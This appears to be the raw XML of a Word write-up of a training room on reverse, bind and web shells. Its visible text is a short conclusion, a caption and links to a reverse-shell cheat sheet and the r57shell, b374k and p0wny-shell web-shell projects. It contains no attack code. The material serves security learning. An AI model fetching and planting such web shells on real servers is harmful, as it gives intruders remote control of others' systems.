            <wp:docPr id="175509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91779" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId48"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2613025"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4F2083" w14:textId="7EA42CAD" w:rsidR="008A3727" w:rsidRDefault="00930D0B" w:rsidP="008C0BA6">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Obtained from powny shell github.</w:t>
      </w:r>
      <w:r w:rsidR="00011654" w:rsidRPr="00011654">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29F9F833" wp14:editId="51D96B92">
            <wp:extent cx="5731510" cy="2649220"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="170491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19176" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId49"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2649220"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00E90290" w:rsidRPr="00E90290">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005D2DA8" w:rsidRPr="005D2DA8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="510DF948" wp14:editId="2639CAC3">
            <wp:extent cx="5731510" cy="2540635"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="4791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53667" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId50"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2540635"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00894D91" w:rsidRPr="00894D91">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3875DAED" wp14:editId="02BD0F64">
            <wp:extent cx="5731510" cy="2432685"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="14679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6787" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId51"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2432685"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00FF5277" w:rsidRPr="00FF5277">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B4375F9" wp14:editId="3D0D236B">
            <wp:extent cx="5731510" cy="842010"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="151443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35222" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId52"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="842010"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00942C88" w:rsidRPr="00942C88">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57180F74" wp14:editId="5E4E3750">
            <wp:extent cx="5731510" cy="939165"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="74324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45054" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId53"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="939165"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="006F33BC" w:rsidRPr="006F33BC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0CACBDBD" wp14:editId="00B0A3FB">
            <wp:extent cx="5731510" cy="2654935"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="49624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47356" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId54"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2654935"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="006F33BC" w:rsidRPr="006F33BC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1AD0238C" wp14:editId="1BAAA961">
            <wp:extent cx="5731510" cy="2118360"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="90532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22505" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId55"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2118360"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="004112F5" w:rsidRPr="004112F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="56FD7F85" wp14:editId="021C3AF6">
            <wp:extent cx="5731510" cy="1412240"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="77768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83291" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId56"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1412240"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="004112F5" w:rsidRPr="004112F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="25658625" wp14:editId="733020EC">
            <wp:extent cx="5731510" cy="1999615"/>
            <wp:effectExtent l="0" t="0" r="2540" b="635"/>
            <wp:docPr id="176128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81788" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId57"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1999615"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00C40E70" w:rsidRPr="00C40E70">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B52DB86" wp14:editId="213CA8B0">
            <wp:extent cx="5731510" cy="720090"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
            <wp:docPr id="145243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36067" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId58"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="720090"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABAB58B" w14:textId="59A05CA5" w:rsidR="00841732" w:rsidRDefault="00841732" w:rsidP="00841732">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00841732">
        <w:t>Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F21736" w14:textId="5665F360" w:rsidR="0048329C" w:rsidRPr="0048329C" w:rsidRDefault="0048329C" w:rsidP="0048329C">
      <w:r>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidRPr="0048329C">
        <w:t>n this room, we learned about </w:t>
      </w:r>
      <w:r w:rsidRPr="0048329C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Reverse Shells</w:t>
      </w:r>
      <w:r w:rsidRPr="0048329C">
        <w:t>, </w:t>
      </w:r>
      <w:r w:rsidRPr="0048329C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bind Shells</w:t>
      </w:r>
      <w:r w:rsidRPr="0048329C">
        <w:t>, and </w:t>
      </w:r>
      <w:r w:rsidRPr="0048329C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Web Shells</w:t>
      </w:r>
      <w:r w:rsidRPr="0048329C">
        <w:t>, how they are critical for attackers, penetration testers, and defenders, and how to identify them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52713B12" w14:textId="77777777" w:rsidR="0048329C" w:rsidRPr="0048329C" w:rsidRDefault="0048329C" w:rsidP="0048329C">
      <w:r w:rsidRPr="0048329C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Reverse Shells</w:t>
      </w:r>
      <w:r w:rsidRPr="0048329C">
        <w:t> establish a connection from a compromised machine back to an attacker's system. </w:t>
      </w:r>
      <w:r w:rsidRPr="0048329C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bind Shells</w:t>
      </w:r>
      <w:r w:rsidRPr="0048329C">
        <w:t>, on the other hand, listen for incoming connections on a compromised machine, and </w:t>
      </w:r>
      <w:r w:rsidRPr="0048329C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Web Shells</w:t>
      </w:r>
      <w:r w:rsidRPr="0048329C">
        <w:t> offer attackers a unique avenue for exploiting vulnerabilities in web applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF4142E" w14:textId="77777777" w:rsidR="0048329C" w:rsidRPr="0048329C" w:rsidRDefault="0048329C" w:rsidP="0048329C">
      <w:r w:rsidRPr="0048329C">
        <w:t>Understanding shells is critical for security professionals to either perform penetration testing exercises or to identify and defend systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CADE363" w14:textId="77777777" w:rsidR="00841732" w:rsidRPr="00841732" w:rsidRDefault="00841732" w:rsidP="00841732"/>
    <w:p w14:paraId="645C93D4" w14:textId="77777777" w:rsidR="007E0243" w:rsidRPr="00221F33" w:rsidRDefault="007E0243" w:rsidP="00221F33">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EF2DE39" w14:textId="77777777" w:rsidR="00221F33" w:rsidRPr="003F04E1" w:rsidRDefault="00221F33" w:rsidP="008563F0">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07290051" w14:textId="77777777" w:rsidR="00892C8A" w:rsidRPr="00386B19" w:rsidRDefault="00892C8A" w:rsidP="00386B19"/>
    <w:sectPr w:rsidR="00892C8A" w:rsidRPr="00386B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574E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1228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457AA7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="573C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807C75"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CD20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177297"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C064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EF64A9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CE08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706E7A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0006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1226903">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="596405347">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="294288755">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="653026612">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="644050495">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1718893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5A7"/>
    <w:rsid w:val="00011654"/>
    <w:rsid w:val="0004494F"/>
    <w:rsid w:val="00054FE8"/>
    <w:rsid w:val="000A749D"/>
    <w:rsid w:val="000C51D3"/>
    <w:rsid w:val="000D62A2"/>
    <w:rsid w:val="000E2154"/>
    <w:rsid w:val="000E65F4"/>
    <w:rsid w:val="000E6CFB"/>
    <w:rsid w:val="000F1EE4"/>
    <w:rsid w:val="001114C6"/>
    <w:rsid w:val="00142962"/>
    <w:rsid w:val="00166FD7"/>
    <w:rsid w:val="001974B2"/>
    <w:rsid w:val="001E37BD"/>
    <w:rsid w:val="001F3D1E"/>
    <w:rsid w:val="001F7DAB"/>
    <w:rsid w:val="00221F33"/>
    <w:rsid w:val="002431AC"/>
    <w:rsid w:val="002745A7"/>
    <w:rsid w:val="00277A50"/>
    <w:rsid w:val="0029357D"/>
    <w:rsid w:val="002C43DF"/>
    <w:rsid w:val="002C4E9D"/>
    <w:rsid w:val="002F3F11"/>
    <w:rsid w:val="002F5C59"/>
    <w:rsid w:val="0030471C"/>
    <w:rsid w:val="003054CC"/>
    <w:rsid w:val="00343E0E"/>
    <w:rsid w:val="00362AE9"/>
    <w:rsid w:val="00365BE1"/>
    <w:rsid w:val="00384F07"/>
    <w:rsid w:val="00386B19"/>
    <w:rsid w:val="00390F2C"/>
    <w:rsid w:val="003B146C"/>
    <w:rsid w:val="003C7CB1"/>
    <w:rsid w:val="003F04E1"/>
    <w:rsid w:val="004112F5"/>
    <w:rsid w:val="004267A0"/>
    <w:rsid w:val="00442C2F"/>
    <w:rsid w:val="00447A13"/>
    <w:rsid w:val="0046717E"/>
    <w:rsid w:val="0048329C"/>
    <w:rsid w:val="00483A30"/>
    <w:rsid w:val="0053251B"/>
    <w:rsid w:val="0057070E"/>
    <w:rsid w:val="005B7D7B"/>
    <w:rsid w:val="005C4260"/>
    <w:rsid w:val="005D172C"/>
    <w:rsid w:val="005D2DA8"/>
    <w:rsid w:val="0060100A"/>
    <w:rsid w:val="006173EE"/>
    <w:rsid w:val="006335D4"/>
    <w:rsid w:val="00655BA6"/>
    <w:rsid w:val="00671C47"/>
    <w:rsid w:val="00691DB6"/>
    <w:rsid w:val="006D3416"/>
    <w:rsid w:val="006E06E9"/>
    <w:rsid w:val="006E44BC"/>
    <w:rsid w:val="006F33BC"/>
    <w:rsid w:val="00740501"/>
    <w:rsid w:val="00761722"/>
    <w:rsid w:val="0078323A"/>
    <w:rsid w:val="0079052B"/>
    <w:rsid w:val="007A17EF"/>
    <w:rsid w:val="007C3B8A"/>
    <w:rsid w:val="007C3EDF"/>
    <w:rsid w:val="007E0243"/>
    <w:rsid w:val="00841732"/>
    <w:rsid w:val="008563F0"/>
    <w:rsid w:val="00892C8A"/>
    <w:rsid w:val="00894D91"/>
    <w:rsid w:val="008A3727"/>
    <w:rsid w:val="008C0BA6"/>
    <w:rsid w:val="008C2AC0"/>
    <w:rsid w:val="008D2A28"/>
    <w:rsid w:val="008D35DC"/>
    <w:rsid w:val="008D50C7"/>
    <w:rsid w:val="008E6646"/>
    <w:rsid w:val="00904B5F"/>
    <w:rsid w:val="009129EB"/>
    <w:rsid w:val="0091620C"/>
    <w:rsid w:val="00930D0B"/>
    <w:rsid w:val="00942C88"/>
    <w:rsid w:val="00955ABC"/>
    <w:rsid w:val="00971B59"/>
    <w:rsid w:val="0097688B"/>
    <w:rsid w:val="00996B78"/>
    <w:rsid w:val="009B2509"/>
    <w:rsid w:val="009D0598"/>
    <w:rsid w:val="009F28C2"/>
    <w:rsid w:val="00A1735E"/>
    <w:rsid w:val="00A40041"/>
    <w:rsid w:val="00A53E73"/>
    <w:rsid w:val="00A8604D"/>
    <w:rsid w:val="00AB266D"/>
    <w:rsid w:val="00AC10FF"/>
    <w:rsid w:val="00AD5EFE"/>
    <w:rsid w:val="00AF6E86"/>
    <w:rsid w:val="00B13573"/>
    <w:rsid w:val="00B150FC"/>
    <w:rsid w:val="00B15547"/>
    <w:rsid w:val="00B33124"/>
    <w:rsid w:val="00B3475C"/>
    <w:rsid w:val="00B77E4A"/>
    <w:rsid w:val="00BB481C"/>
    <w:rsid w:val="00BB6FE1"/>
    <w:rsid w:val="00BD4BF8"/>
    <w:rsid w:val="00BD5B1E"/>
    <w:rsid w:val="00BE6BF6"/>
    <w:rsid w:val="00C33184"/>
    <w:rsid w:val="00C40E70"/>
    <w:rsid w:val="00CB4AF9"/>
    <w:rsid w:val="00CD0E52"/>
    <w:rsid w:val="00CD5232"/>
    <w:rsid w:val="00CE4691"/>
    <w:rsid w:val="00CF711E"/>
    <w:rsid w:val="00D0737E"/>
    <w:rsid w:val="00D201FB"/>
    <w:rsid w:val="00D31048"/>
    <w:rsid w:val="00D54D58"/>
    <w:rsid w:val="00D64CF1"/>
    <w:rsid w:val="00D81862"/>
    <w:rsid w:val="00D96239"/>
    <w:rsid w:val="00DB03EF"/>
    <w:rsid w:val="00DB3A69"/>
    <w:rsid w:val="00DB3D5D"/>
    <w:rsid w:val="00DB7055"/>
    <w:rsid w:val="00DD1D30"/>
    <w:rsid w:val="00DD6104"/>
    <w:rsid w:val="00DE7D63"/>
    <w:rsid w:val="00E11A1F"/>
    <w:rsid w:val="00E11D2B"/>
    <w:rsid w:val="00E20536"/>
    <w:rsid w:val="00E2574E"/>
    <w:rsid w:val="00E5513D"/>
    <w:rsid w:val="00E90290"/>
    <w:rsid w:val="00EB21CC"/>
    <w:rsid w:val="00EC6828"/>
    <w:rsid w:val="00ED3A14"/>
    <w:rsid w:val="00EF5421"/>
    <w:rsid w:val="00F54B1F"/>
    <w:rsid w:val="00F62FC1"/>
    <w:rsid w:val="00F64EB5"/>
    <w:rsid w:val="00F65644"/>
    <w:rsid w:val="00F7719F"/>
    <w:rsid w:val="00F776E9"/>
    <w:rsid w:val="00FA1D34"/>
    <w:rsid w:val="00FB7999"/>
    <w:rsid w:val="00FC5218"/>
    <w:rsid w:val="00FE0A46"/>
    <w:rsid w:val="00FE444D"/>
    <w:rsid w:val="00FF1FFE"/>
    <w:rsid w:val="00FF5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AB0F5"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{53A26794-75DB-454E-9A2A-6024D29C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4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4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4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4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5A7"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00274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5A7"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="002745A7"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="002745A7"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="002745A7"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="00274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5A7"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="002745A7"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00FE444D"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00FE4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0.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.r57shell.net/index.php" TargetMode="External"/><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hyperlink" Target="https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet" TargetMode="Externa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r57shell.net/single.php?id=13" TargetMode="External"/><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github.com/b374k/b374k" TargetMode="Externa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3.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hub.com/flozz/p0wny-shell" TargetMode="External"/><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19</Pages>
  <Words>2708</Words>
  <Characters>15439</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>128</Lines>
  <Paragraphs>36</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <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151</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-03-02T15:57:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-06T18:20:00Z</dcterms:modified>
</cp:coreProperties>
</file>